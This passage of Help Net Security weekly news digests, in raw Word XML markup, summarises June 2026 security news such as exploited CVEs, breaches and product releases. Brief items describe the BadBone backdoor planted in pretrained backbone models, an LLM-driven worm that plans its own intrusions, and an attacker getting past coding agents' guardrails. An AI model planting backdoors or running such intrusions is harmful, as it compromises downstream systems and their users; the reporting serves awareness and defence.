the data can read it. A research paper by Gregory Magarshak, a professor at IENYC, describes a system called Safecloud built on one design rule: the nodes that store data see only ciphertext, and the nodes that route data hold no keys.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PhishLumos: Exposing phishing campaigns that evade detection by hiding content Phishing remains one of the most stubbornly persistent threats in cybersecurity: humans are tired, distracted, trusting, and susceptible to urgency and authority in ways that no amount of awareness training can completely overcome. The security community has largely accepted this reality and shifted focus toward automated detection systems that can intercept and block phishing threats before users see them.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China-linked spies backdoored authentication stack to stay hidden for years A China-linked cyber espionage group known as Velvet Ant spent nearly a decade inside the internal network of an unnamed organization without being detected, according to the results of a forensic investigation published by cybersecurity firm Sygnia.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Cisco discloses second exploited SD-WAN vulnerability in two weeks (CVE- 2026-20262) Cisco has revealed another Catalyst SD-WAN Manager vulnerability (CVE-2026- 20262) that its Product Security Incident Response Team observed being exploited by attackers. But the associated security advisory also states that "the vulnerability was found during internal security testing", raising the question of how attackers came to exploit it before Cisco had disclosed it publicly.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SimpleHelp RMM flaw could give attackers full access to managed endpoints (CVE-2026-48558) A critical vulnerability (CVE-2026-48558) in SimpleHelp, a popular remote monitoring and management (RMM) tool, can be exploited remotely by unauthenticated attackers to create a new "Technician" account and use it to remote into managed endpoints, execute scripts, and more.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Attackers are exploiting FortiSandbox vulnerabilities Attackers have been spotted exploiting three vulnerabilities (CVE-2026- 39813, CVE-2026-39808, CVE-2026-25089) in FortiSandbox, a platform that other Fortinet security products depend on for threat verdicts to enforce blocking decisions and trigger automated responses. The warning came on Monday from threat intelligence company Defused, which said that the exploit for one of the flaws is vibecoded, and likely faulty.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Microsoft working on patch for RoguePlanet Defender zero-day (CVE-2026- 50656) Microsoft has acknowledged the local elevation of privilege issue in Microsoft Defender that can be triggered via the "RoguePlanet" exploit, and is "working to provide a high quality security update that addresses this vulnerability." The vulnerability, which has been assigned the CVE-2026- 50656 identifier, stems from improper link resolution before file access, and can be exploited in low complexity attacks by authenticated attackers, with no user interaction required.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Low-skilled attacker used Claude, Codex to breach 14 companies Researchers have long warned that AI agents could lower the skill floor for offensive cyber operations, and a recent report by OALABS (Open Analysis) researchers bears that out. After recovering and analyzing over 1,000 agent sessions from a compromised server on which an attacker deployed Anthropic's Claude Code and OpenAI's Codex agents, the researchers discovered how easily the attacker was able to bypass most of the agents' guardrails, and how little he actually needed to know and do himself.</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74,000 Fortinet firewall credentials exposed in FortiBleed data leak A Russian-speaking cybercriminal group has stolen credentials contained in the configuration files of nearly 74,000 Fortinet firewalls and VPN gateways around the world. The data was accidentally exposed by the group on a server, along with other artifacts and tools, and the exposure was noticed by security researcher Volodymyr "Bob" Diachenko.</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Law enforcement hits SocGholish: 106 servers down, 15,000 sites cleaned SocGholish, an operation that's been delivering malware to users via fake software updates, has suffered a major blow: the international law enforcement coalition behind Operation Endgame has taken down 106 of its servers and domains, and cleaned up nearly 15,000 websites compromised to serve their malicious payloads. The result of this most recent multinational law enforcement action was announced today by the Dutch National Police and on the operation's website.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Unauthenticated RCE in Splunk Enterprise under active attack (CVE-2026- 20253) CISA has added CVE-2026-20253, a critical, remotely exploitable vulnerability in Splunk Enterprise, to its Known Exploited Vulnerabilities catalog, and ordered US federal civilian agencies to apply mitigations by June 21, 2026.</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EU Cybersecurity Act 2.0: When good regulation goes bad Over recent years we've witnessed the EU becoming increasingly serious about cybersecurity. After years of watching high profile breaches, many resulting from supply chain attacks targeting our critical infrastructure, that seriousness is welcome. But good intentions and good policy are not the same thing, and the proposed EU Cybersecurity Act 2.0 is starting to look a lot more like the former than the latter.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Navigating SEC, NIS2, and DORA incident disclosure timelines under pressure In this Help Net Security video, Rick Goud, Global Field CTO at Kiteworks, discusses how to handle SEC, NIS2, and DORA disclosure timelines during a security incident.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Proving what a military AI model will do is the real problem Defense contractors build AI systems that task drones automatically and propose kill-chains to support soldiers. Several of these contractors have partnered with frontier AI companies to put advanced models into military tools. The systems coming out of these partnerships carry a security problem that sits outside the methods of arms control diplomacy: confirming what an AI model will do.</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Open-source CI/CD abuse detector guards against stolen credential attacks CI/CD Abuse Detector is an open-source project that uses a large language model to flag suspicious changes to continuous integration and continuous deployment pipelines, workflows, and automation configurations. The repository contains drop-in templates for GitHub Actions, GitLab CI, and Azure DevOps.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Ukrainian national pleads guilty in connection with Conti ransomware A Ukrainian national pleaded guilty to conspiracy to commit wire fraud in connection with the deployment of Conti ransomware, which targeted more than 1,000 victims worldwide.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Chinese hackers breached North American research institutions via REDCap servers A China-linked cyber espionage operation targeted North American medical research institutions through compromised REDCap servers, using custom malware to gain persistent access and collect sensitive information, Google's Threat Intelligence Group (GTIG) researchers found.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Planning a trip? Fake travel sites are multiplying this summer Cyberattacks against hospitality, travel, and recreation organizations rose 24% year over year, reaching an average of 2,291 incidents per organization each week in May 2026, according to Check Point.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Crypto scammers are sending couriers to victims' homes to collect cash Scammers behind cryptocurrency investment schemes are dispatching couriers to pick up cash from victims in person, the FBI warns. According to the agency, scammers usually approach victims through social media, text messages, or fake investment personas, luring them into cryptocurrency schemes that use fraudulent trading platforms and fabricated returns to encourage additional deposits.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Cybercriminals mask malicious communications through Microsoft Teams relays The DragonForce ransomware group used a custom malware called Backdoor.Turn to hide command-and-control traffic inside Microsoft Teams relay infrastructure during an intrusion at a U.S. services company, according to Symantec.</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Apple is bringing Hide My Email and Sign in with Apple under one domain Apple will unify the email domains used by Sign in with Apple and iCloud+ Hide My Email under a shared domain, private.icloud.com, later this summer. Hide My Email is a service included with iCloud+, Apple's subscription service. It allows users to generate one-time-use or reusable email addresses that forward messages to their personal inbox without revealing their actual email address.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Rokarolla Android trojan targets banking and crypto users, enables device takeover A newly discovered Android banking trojan, dubbed Rokarolla, targets 217 banking and cryptocurrency applications and can execute 137 commands on infected devices, according to researchers at Zimperium. Named after its command-and-control (C2) infrastructure, Rokarolla is primarily distributed through malicious websites that impersonate popular applications such as TikTok and Google Chrome, fooling users into downloading what appears to be a legitimate app.</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Another healthcare firm attacked days after Novo Nordisk breach Medical technology company iRhythm Holdings disclosed a cyberattack involving certain third-party-hosted business applications that resulted in the theft of patient protected health information, proprietary data, and other personal data. The company discovered unauthorized activity on June 8, 2026, and launched an investigation with the assistance of external cybersecurity experts.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AWS Continuum brings AI models to code vulnerability management AWS Continuum for code vulnerabilities, a system built to handle a vulnerability across its lifecycle, from discovery through to a fix, is now available in gated preview. It reasons over a customer's environment, confirms which findings are real, and works toward resolution. It is model agnostic and draws on multiple frontier models, assigning each to the work where it performs best. AWS designed it to take in newer models as they become available.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Malware attacks strip Roblox developers of entire games Hackers who once focused on stealing valuable Roblox items are now taking over entire games. Although Roblox operates the service, users can create and publish their own games on it. Successful games can generate substantial revenue through in-game purchases. Some developers have earned millions of dollars and built dedicated studios around their creations.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Klue breach lead to Salesforce data theft, Huntress affected Cybersecurity vendor Huntress was among multiple companies hit by a breach originating at Klue, a market intelligence platform used to integrate CRM and sales data across various business tools.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Senior engineers are spending their week cleaning up AI-generated code At most U.S. technology companies, machines now write the bulk of the code that ships each week. The engineer's job has shifted toward reviewing what the AI produces, and that review gives the code high marks. Leaders rate AI- generated code as higher quality than the code their own people write, praising its clean structure, consistent style, and low count of obvious bugs at submission time.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Microsoft's workplace check-in via Wi-Fi tracks who's in the office, and not everyone's happy Microsoft is rolling out workplace check-in via Wi-Fi for Teams and Microsoft Places. Connect to your office network and your in-office presence updates automatically, no manual status change needed.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$2 trillion revenue shift hinges on AI data governance Across large enterprises, a single question keeps surfacing when teams want to put customer data to work. Can this record be used for a given purpose, and does the consent behind it still hold? The data sits in warehouses and customer databases, and the ability to answer that question often lags behind. That delay carries a cost.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GitHub releases an open dataset for multilingual developer content Developers coordinate code across README files, issue threads, and pull request discussions. Much of that exchange happens in English, and a large share happens in other languages. GitHub has released a dataset built to help researchers and developers locate public repositories that carry non- English natural-language content.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Software supply chains are heading for a transparency test Software supply chain visibility is becoming part of product security work as the EU Cyber Resilience Act (CRA) moves toward application in December 2027. ENISA's SBOM Adoption State of Play 2026 shows organizations preparing for CRA obligations through SBOM tooling, automation, and changes to software development practices.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checklist problem behind critical infrastructure cyber safety An asset owner can meet major federal cyber compliance standards and still run equipment that lacks the engineering to withstand an attack or a failure. New research from George Mason University examines how United States cyber policy defines reasonable care for systems that control physical processes, and it finds that compliance has become a stand-in for safety.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Product showcase: From phishing texts to risky Wi-Fi, Norton 360 Deluxe watches the gaps Norton 360 Deluxe combines device security, scam detection, web protection, and VPN privacy in a single subscription that covers up to five devices. It is available for Windows, macOS, Android, and iOS.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Microsoft AntiSSRF open-source library helps block server-side request forgery AntiSSRF is an open-source code library from Microsoft that validates URLs and network connections to reduce server-side request forgery (SSRF) risks in web applications. It supports .NET and Node.js applications and is distributed under the MIT license. The library works as a drop-in component, giving developers a way to check untrusted input before their applications make outbound requests.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Ukraine can now tap EU cyber support during major attacks Ukraine can now call on emergency cyber support from the European Union during large-scale cybersecurity incidents. The move follows a decision by the Council of the European Union to add the country to the EU Cybersecurity Reserve.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What's new in Android 17? Anti-theft tools, scam detection, and parental controls The Android 17 rollout has started for supported Pixel devices, delivering new security and privacy capabilities before expanding to other devices later this year.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agentic AI projects in production have stalled over data problems Enterprises are connecting AI agents to live data feeds and putting them to work on tasks that once required human review, from IT operations to software development. The number doing this in production reached 32 percent in 2026, up from 29 percent the year before, according to Confluent's annual Data Streaming Report, which surveyed 4,625 IT leaders across 14 countries.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Homebrew tightens tap security, begins work on its interface Anyone who installs software through a third-party Homebrew tap runs Ruby code written by people outside the project, and that code runs without a sandbox. That risk sits at the center of Homebrew 6.0.0. It now requires a tap, along with any tap-qualified formula or cask, to be trusted before its code is evaluated or run.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Google's open standard for AI agents to discover and verify tools AI agents rely on tools, services, and other agents distributed across different teams, organizations, and platforms. Because these resources are often isolated in separate systems, agents have limited ability to discover and connect to capabilities outside their own environment. Google aims to solve this with Agentic Resource Discovery, an open specification for publishing, discovering, and verifying AI capabilities across the web, regardless of framework, protocol, or provider.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GentleKiller targets more than 400 security processes across 48 products Most ransomware operations leave the work of disabling endpoint security software to their affiliates. The ransomware-as-a-service gang Gentlemen runs a different model. Its operators develop and maintain a set of tools for shutting down endpoint detection and response (EDR) products, then provide these tools directly to the affiliates who rent the gang's encryptors.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Asia-Pacific scam networks generate nearly $40 billion a year Cybercrime is taking a larger share of criminal activity in Asia and the Pacific. More than half of surveyed jurisdictions reported that cybercrime accounts for over 30% of all crimes recorded nationally, according to INTERPOL's 2025/2026 Asia and South Pacific Cyberthreat Assessment Report.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Companies are discarding the logs they need to catch a breach Many large enterprises discard most of the log data their systems generate, and they do it on purpose to keep costs down. A Dynatrace survey of 450 senior IT leaders at large enterprises found that half of organizations drop or never collect an average of 86 percent of their logs, even after filtering and aggregation. Many also limit how long they retain the logs they do keep.</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The rise of machine identities and agentic AI: Securing trust in the next era of digital autonomy For years, identity security has been centered on humans, ensuring that the right person has the right level of access to the right resources. But now, the same principle applies to non-human entities: machines, APIs, bots, and increasingly, AI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>agents. These new "digital actors" authenticate, access sensitive information, execute workflows, and even make decisions, often faster and at greater scale than any human ever could.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How security teams are getting credential visibility into developer endpoints Attackers increasingly target developer machines to steal credentials. Recent supply chain attacks, including Megalodon, TrapDoor, and Miasma, focused on compromising developer environments where secrets often reside in shell histories, .env files, cloud CLI configs, local caches, and AI agent directories. To address this risk, GitGuardian has introduced Developer Endpoint Protection in ggshield, enabling organizations to discover credentials on developer workstations.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Google sets timeline for Android developer verification enforcement Android's developer verification protections will take effect on September 30, 2026, starting with users in Brazil, Indonesia, Singapore, and Thailand. Developers distributing apps through participating stores in those markets must complete the verification process by the deadline.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Mastodon 4.6 adds profile Collections and two-factor controls People who run accounts on the open source social network Mastodon can now group profiles together and share those groups across the web. The 4.6 release centers on a feature called Collections, along with reworked profiles, email newsletters, server administration controls, and a set of accessibility changes.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Forget traffic lights, Google's reCAPTCHA may ask for hand gestures Google has introduced hand gesture verification for reCAPTCHA, a new method for verifying that a user is human. Google's reCAPTCHA is part of Google Cloud Fraud Defense, a fraud and abuse prevention platform for bot, account, and transaction protection. It uses risk analysis and challenge- based verification to help organizations identify automated activity and suspicious behavior.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Cybersecurity jobs available right now: June 16, 2026 We've scoured the market to bring you a selection of roles that span various skill levels within the cybersecurity field. Check out this weekly selection of cybersecurity jobs available right now.</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New infosec products of the week: June 19, 2026 Here's a look at the most interesting products from the past week, featuring releases from ArmorCode, Barracuda Networks, Blue Planet, Flip, Fortinet, Legit Security, Tigera, and WitnessAI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Help Net Security 2026.06.21 11:39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.helpnetsecurity.com/2026/06/21/week-in-review-74k-fortinet-firewall-credentials-stolen-splunk-enterprise-rce-under-active-attack/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Week in review: Cisco SD-WAN 0-day exploited, Patch Tuesday forecast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Here's an overview of some of last week's most interesting news, articles, interviews and videos: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OWASP Agent Memory Guard: Stop AI agents from being weaponized through their own memory Agent Memory Guard is an open-source runtime defense layer that sits between an agent and its memory store, screening every read and write through a pipeline of detectors and a YAML policy. The project is the OWASP reference implementation for ASI06, Memory Poisoning, one entry in the OWASP Top 10 for Agentic Applications.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Data discovery gaps that catch enterprises off guard In this interview with Help Net Security, Avani Desai, CEO at Schellman, talks about the gap between what organizations think they know about their data and what discovery scans turn up. She shares stories of shadow data in abandoned cloud storage, post-merger surprises where duplicated datasets slowed integration, and why synthetic data is overmarketed while confidential computing stays underappreciated.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Zero trust physical security needs trust decisions at the edge In this interview with Help Net Security, Chuck Davis, VP, Global Information Security at Hikvision, explains how zero trust applies to physical security systems like cameras and door controllers. He breaks down how to make trust decisions at the edge without recreating old perimeter assumptions, why these devices should be treated as IT assets, and what the Mirai botnet taught the industry.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small Slovenian team handles 6,000 cyber incidents a year Online fraud complaints, ransomware cases, and phishing tips reach Slovenia's national cyber response center in steady volume, and a team of around a dozen analysts sorts through them. Gorazd Bozic, who manages SI- CERT at the public agency ARNES, described that work in an interview conducted in person at the Span Cyber Security Arena conference. He put the original proposal for a Slovenian CERT to ARNES leadership in 1994, and the center now records about 6,000 incidents a year, up from roughly 300 ten to fifteen years earlier.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Only 11% of production agents pass the AI agent security bar Enterprise teams are running AI agents that write code, drive browsers, answer customer calls, manage cloud infrastructure, and query data warehouses with standing credentials. A new independent assessment of 100 production agents finds that nearly all of them carry the conditions for a single hostile document to take them over.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Spotless compliance evidence can still hide a broken control In this interview with Help Net Security, Marc Rubbinaccio, Head of Cybersecurity and Compliance at Secureframe, explains where security teams go wrong when preparing for CMMC and FedRAMP 20x. The conversation covers how organizations check the 110 requirements </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>but miss the 320 assessment objectives beneath them, why spotless SOC 2 evidence can hide a broken control, and how continuous monitoring is changing compliance work.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OAuth marketplace apps keep access after publishers vanish Installing an app from the Google Workspace Marketplace or GitHub Marketplace can grant a third party access to company email, files, calendars, code repositories, CI workflows, organization settings, and secrets. Marketplace presence gives these apps the appearance of approval. The OAuth grants behind them often reach into business systems beyond the listed function.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Thieves can pull off keyless car theft in under a minute and here's how to stop them A keyless car can be stolen in under a minute. Two people, a pair of cheap radio amplifiers, and a fob sitting on a hallway table inside the house. That is enough. No broken glass. No alarm. No sound. The vulnerability runs across the global market. Germany's largest auto club, ADAC, runs ongoing tests of keyless models against relay attacks.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AgentGG: Open-source agentic SAST scanner Static analysis tools have spent years matching source code against known- bad patterns and handing engineers long lists of candidate issues to triage by hand. AgentGG approaches the same job with AI agents that read the code, follow imports, walk the call graph, and confirm a finding before they report it. The project is an open-source agentic SAST scanner released under the Apache 2.0 license.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Hackers are exploiting Palo Alto GlobalProtect VPN authentication bypass (CVE-2026-0257) Authentication bypass vulnerabilities (CVE-2026-0257) in Palo Alto Networks' firewalls that the company disclosed on May 13 have been targeted in "limited exploit attempts". The good news, though, is that the company hasn't observed any indication of successful lateral movement from the devices.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How NIST fumbled management of the National Vulnerability Database A US federal watchdog has outlined how the National Institute of Standards and Technology (NIST) failed to effectively manage the growing backlog of unprocessed cybersecurity vulnerabilities in the National Vulnerability Database (NVD).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Windows Netlogon RCE exploited, domain controllers at risk (CVE-2026-41089) CVE-2026-41089, a critical Windows Netlogon RCE flaw that allows remote code execution, is now actively exploited in the wild, the Centre for Cybersecurity Belgium (CCB) warned last Friday. CVE-2026-41089 is a stack- based buffer overflow vulnerability in Windows Netlogon, the service and protocol that handles authentication and security within a Windows domain environment.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Google fixes actively exploited Android vulnerability (CVE-2025-48595) Google has announced the June 2026 Android security updates, which fix a bucketload of vulnerabilities, including a high-severity vulnerability (CVE- 2025-48595) in the Android Framework that "may be under limited, targeted exploitation."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Autonomous AI-driven worm can reason its way through corporate networks Researchers at the University of Toronto, the Vector Institute, and the University of Cambridge have built and tested a proof-of-concept AI-driven worm that does not operate on a fixed list of exploits. Instead, it analyzes each target it encounters, reasons about how to attack it, and creates a strategy on the fly, all with the help of a small, free large language model (LLM) running directly on machines it has already compromised.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Cisco SD-WAN 0-day exploited, no patch available (CVE-2026-20245) A 0-day privilege escalation vulnerability (CVE-2026-20245) in Cisco Catalyst SD-WAN Manager that has yet to be patched by Cisco is being leveraged by attackers.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2026 Patch Tuesday forecast: Where are the CVEs?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Forecast from last month was only partly right. After the Anthropic Mythos announcements and the deluge of newly discovered vulnerabilities from vendors like Mozilla, Microsoft's updates were standard fare, 65 CVEs reported in Windows 11 and 58 in Windows 10.</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modern-day business can learn a lot about risk from this year's mega events Every year brings its share of global events, but 2026 is proving to be a banner year for mega-scale entertainment. The year got off to a roaring start with the Winter Olympics, and now anticipation is building for the fast-approaching FIFA World Cup. But amid the buzz, have you ever paused to consider the staggering level of risk inherent to such large-scale events? Or how impressive it is that organizers are able to manage that risk so successfully?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From critical to controlled: Cutting vulnerabilities in a live manufacturing environment A vulnerability scanner flags a critical CVSS 10 vulnerability on an industrial asset. The report lands in the boss' inbox and now he wants to know why we're sitting on a critical vulnerability. In a normal IT environment, you patch it then close the ticket and call it a day. If, however, you're in OT or dealing with ICS in a live manufacturing facility, it's rarely that simple.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Why you need BAS and autonomous pentesting together A new autonomous penetration testing tool delivers impressive results at first-finding critical issues, uncovering undocumented attack paths, and exposing forgotten accounts. But by the fourth or fifth run, the discoveries dry up. The tool keeps reporting the same stale issues, and the dashboard becomes another source of noise. What seemed like continuous validation quietly turns into a repeat of the same well-worn attack paths.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Governing shadow AI without killing innovation In this Help Net Security video, Alan Snyder, CEO at NowSecure, talks about governing shadow AI without stopping innovation. He frames the problem as two opposing forces. Companies need to adopt AI fast because attackers and competitors will outpace them otherwise, but they also need to do it safely.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What CISOs need to do about post-quantum migration in the next 24 months In this Help Net Security video, Garfield Jones, SVP Global Strategy and Research, QuSecure, lays out what CISOs should do over the next 24 months. A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>recent Google paper moved the expected arrival of a cryptographically relevant quantum computer from 2035 to 2029, leaving organizations about two and a half years to prepare.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AI agent governance gets harder when agents outnumber your people In this Help Net Security video, Amit Gautam, CTO at Abluva, explains the security risks that autonomous AI agents bring into enterprise environments.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EU organizations buckle under rising compliance pressure Cybersecurity governance in the EU is shifting under expanding frameworks such as NIS2 and DORA, while AI raises new questions for security teams. What the future brings is hard to predict, and organizations must find a way to cope. Antonija Vojnovi'c, Governance, Risk and Compliance Department Manager at Span, spoke with Help Net Security at the Span Cyber Security Arena conference about how these regulatory frameworks are shaping compliance priorities and day-to-day decision-making.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DNS-AID lets AI agents find and verify each other through DNS AI agents run across many platforms, and each one needs a way to locate and confirm the identity of the others it works with. The Linux Foundation's DNS-AID project gives them that capability through the Domain Name System, the same address lookup system that has directed internet traffic for decades. The project lets AI agents and Model Context Protocol (MCP) servers use DNS as a global, vendor-neutral directory for publishing, discovering, and verifying one another.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Brute-force attack triggers Dashlane account lockouts Password manager Dashlane has confirmed that a brute-force attack targeting user accounts triggered temporary account suspensions and authentication issues. The company first acknowledged the incident on May 31 after users reported receiving account suspension emails and experiencing login problems.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Meta tries to get ahead of scammers before the World Cup begins Football fans are counting down the days until the FIFA World Cup begins, and scammers are doing the same. Last week, the FBI warned that cybercriminals are spoofing FIFA websites to steal personal information, sell fake tickets, and promote fraudulent hospitality packages ahead of the tournament.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Sensitive government personnel data posted online, Spanish police arrest suspect The Spanish National Police arrested a man in Granada for allegedly leaking personal data belonging to members of several sensitive state institutions.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64,000 accounts exposed in breach of GTA V cheat service Atlas Menu Atlas Menu, a cheat service for Grand Theft Auto V and Counter-Strike 2, has been added to the Have I Been Pwned database following a data breach that exposed tens of thousands of user records. The incident exposed approximately 64,000 accounts, including email addresses, usernames, IP addresses, support tickets, and passwords hashed with bcrypt.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Anthropic expands Project Glasswing to 150 organizations in more than 15 countries Anthropic is expanding Project Glasswing, its cybersecurity initiative built around the Claude Mythos Preview model, by adding about 150 organizations following several weeks of work with its initial group of partners, security firms, open-source maintainers, and government agencies.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Malware campaign targeting Minecraft users infects over 116,000 systems A Malware-as-a-Service (MaaS) operation named WeedHack is targeting Minecraft users and allows threat actors to gain remote access to victims' screens, webcams, and files through a web-based dashboard, McAfee researchers found.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Microsoft responds to security challenges facing code, AI agents, and models Microsoft has introduced a series of security tools and capabilities focused on AI-driven vulnerability discovery, AI agents, and AI models. The updates include a multi-agent vulnerability discovery system, new controls for managing and securing AI agents, data protection capabilities, and tools designed to identify potentially vulnerable or compromised AI models before deployment.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AI is helping low-skill hackers pull off advanced cyberattacks Anthropic has published an analysis of cyber-related misuse of its AI systems, examining 832 accounts that were banned for malicious cyber activity between March 2025 and March 2026. The company mapped the observed behavior to the MITRE ATT&amp;CK framework, which documents tactics and techniques used by attackers.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Attackers obtained encrypted password vaults from some Dashlane user accounts Dashlane has disclosed new details about a brute-force attack that let a threat actor access some customer accounts and copy encrypted vaults. Dashlane said it found no evidence that the attackers compromised its internal systems. The company first acknowledged the incident on May 31 after users reported receiving account suspension emails and experiencing login problems.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145 AI laws passed in 2025 and privacy teams aren't catching a break 145 AI-related laws were enacted by state legislatures in 2025, and more than 1,000 additional bills were introduced or revised, according to DataGrail's Privacy and AI Trends Report 2026.</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NVIDIA goes open source with a big batch of physical AI agent tools NVIDIA just dropped a big batch of open-source "physical AI" skills and tools, and they're designed to make a roboticist's life a whole lot easier. The idea? Take the messy, complicated work behind robots, self-driving cars, vision AI, and industrial digital twins, and break it into bite-sized tasks that AI agents can actually run themselves.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Microsoft Defender Vulnerability Management gets a smarter exposure score Microsoft Defender Vulnerability Management's updated exposure score model adds vulnerability risk signals and asset context to help teams understand where risk is concentrated and which remediation actions are likely to have the greatest impact. The model is available in public preview.</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This AI model backdoor attack stays hidden until you customize the model Most teams that deploy AI start with a backbone model. They download a large pre-trained system, adapt it to a specific task, and put it into production. The download step carries a security question: the origin of the model. A research team built an attack called BadBone. It plants a backdoor inside a backbone model. Downstream tasks that adapt the model inherit the backdoor. The name points at the target. Corrupt the skeleton, and systems built on top of it carry the flaw.</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brings frontier AI to existing AWS environments OpenAI frontier models and Codex are now available on AWS, giving customers access to OpenAI capabilities within AWS environments and the controls needed to move more quickly from evaluation to deployment. These capabilities are available through OpenAI models on Amazon Bedrock, a platform for building generative AI applications and agents at production scale. The platform enables teams to build AI applications using AWS-native security and governance controls.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KDE Linux security audit cuts kernel modules and unused packages KDE Linux, the in-progress operating system from the KDE community, removed several kernel modules and software packages after a security audit of the components shipped with the system. The work followed the discovery of multiple security issues in the upstream Linux kernel during the prior month.</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Codex knowledge work expands into research, reports, and spreadsheets Office workers in the United States lose hours each week to email triage and to searching for files spread across disconnected systems. Roughly 40 percent of US labor, about 72 million people, works primarily with information such as analysis, documents, designs, and communication. Research from the McKinsey Global Institute puts the average knowledge worker at 28 percent of the workweek on email and close to 20 percent on hunts for internal information or for colleagues who can help with specific tasks.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Meta adds stricter guardrails for teen feeds Meta has expanded its Teen Accounts 13+ content settings globally on Instagram, Facebook, and Messenger. The safeguards are designed to help young users see age-appropriate content by default. The company also introduced Limited Content on Instagram for parents seeking stricter restrictions. Meta plans to roll out the feature on Facebook and Messenger later this year.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Known vulnerabilities behind most application security incidents Eight in ten organizations took an application security hit during the past year tied to a vulnerability their team had already cataloged, according to a survey of 902 IT and security professionals conducted by the Cloud Security Alliance. The pattern points to a structural condition across the industry, where the window between identifying a flaw and closing it in production stays open long enough for attackers to act.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Agent Threat Rules: Open detection rule format for AI agent security threats AI agents run inside coding assistants, MCP servers, and multi-agent frameworks, and the access that makes them useful also opens paths to prompt injection, tool poisoning, and credential theft. Public CVE feeds carry agent-execution flaws that reach production faster than the tooling built to catch them. Agent Threat Rules, or ATR, is an open detection format aimed at this category of attack.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Microsoft Scout agent opens a new category of always-on Autopilots Workplace AI assistants have mostly waited for a prompt before doing anything. A user asks, the tool answers, and the exchange ends there. Microsoft is putting a different kind of agent inside its Office applications, one designed to keep operating in the background once a person stops paying attention. The company introduced Microsoft Scout, calling it the first entry in a category it labels Autopilots.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New Android feature promises to spot deepfake scam calls Android is introducing fake call detection to help protect users from impersonation scams. The feature can detect and flag suspected spoofed calls when both parties use Phone by Google on Android 12 or later. It will roll out globally this month, starting with Pixel devices.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ETSI sets security requirements for AI data centers and cloud platforms ETSI has published TS 104 033, a technical specification that defines security requirements for AI computing platforms. The specification establishes a security framework for platforms used to host AI applications in data center and edge computing environments, covering security functions, platform components, interfaces, and services designed to protect AI models, datasets, training processes, and inference workloads.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Product showcase: Trend Micro Mobile Security detects scams in messages, QR codes, and websites Trend Micro Mobile Security for iOS protects devices from potentially harmful websites while browsing, blocks ads and personal information trackers, helps users avoid unsafe Wi-Fi networks, and monitors data usage. The app is available for both iOS and Android devices.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pros have seen AI hallucinations in IT operations Autonomous AI is taking action inside enterprise IT environments. Software is restarting services, isolating risky devices, and applying patches without waiting for a human to approve the step. The capability is spreading at the same time IT professionals are reporting frequent encounters with AI output errors that can carry operational impact.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Let's Encrypt works toward post-quantum certificates at web scale Let's Encrypt plans to pursue a post-quantum-safe Web PKI through Merkle Tree Certificates (MTCs), a new approach that adds post-quantum authentication to the web without sacrificing the speed and reliability that have made TLS universal. The project is targeting late 2026 for a staging environment that issues MTCs, with a production-ready environment planned for 2027.</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Photos: Infosecurity Europe 2026 Infosecurity Europe 2026 is a cybersecurity event that took place from June 2 to 4 in London. Help Net Security was on-site and here's a closer look at the conference.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Attackers already know the secrets are on your developers' machines. Do you? In a recent GitGuardian analysis, an average of 150 secrets were found on a sample of developer endpoints. Private keys accounted for 38% of unique secrets, while cloud, identity provider, and secret management credentials (AWS IAM, Hashicorp vault) added another 22%.</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Simplify security management with CIS SecureSuite Platform CIS SecureSuite Membership simplifies the process with tools, benefits, and resources for implementing the secure recommendations of the CIS Benchmarks. With the release of CIS SecureSuite Platform, it's now even easier for Members to harden their systems.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Cybersecurity jobs available right now: June 2, 2026 We've scoured the market to bring you a selection of roles that span various skill levels within the cybersecurity field. Check out this weekly selection of cybersecurity jobs available right now.</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New infosec products of the week: June 5, 2026 Here's a look at the most interesting products from the past week, featuring releases from Asimily, depthfirst, Diligent, Hyland, MazeBolt, 